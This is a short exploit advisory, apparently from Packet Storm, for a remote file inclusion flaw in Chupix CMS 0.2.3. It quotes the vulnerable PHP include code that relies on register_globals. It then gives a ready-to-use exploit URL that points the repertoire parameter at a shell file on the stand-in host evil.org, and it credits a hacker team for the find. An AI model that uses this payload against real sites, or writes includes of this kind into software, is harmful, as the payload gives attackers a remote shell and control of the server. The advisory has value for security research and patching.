Chupix CMS version 0.2.3 suffers from a remote file inclusion vulnerability.
a4e953901d2a70f58038414dd8415b25e8d4e55d7af26f54cdf81ae81e2e37a9#chupix 0.2.3 /admin/include/header.php RFI
#f0und by 0in
#contact: 0in.email@gmail.com
#Greetings to:Die-angel,Slim,Joker186,Kaja,Artysta,wojto111,reydex
#team:Our Dark-Coders team;]
--------------------------------------------------------------------------------------------------------------------
#register_globals=On
BUG:
include($repertoire .'db/config/config.php'); // lecture de la configuration souhaitée par l'utilisateur
include($repertoire .'include/template.php'); // classe de création des templates
include($repertoire .'include/MyTxt.php'); // inclusion de la classe MyTxt
$path_lang = $repertoire ."langues/". $conf__lang ."/admin.php";
include($path_lang); // Chargement du fichier de langues
EXPLOIT:
http://x.com/[patch]/admin/include/header.php?repertoire=http://evil.org/shell.txt ?
--------------------------------------------------------------------------------------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed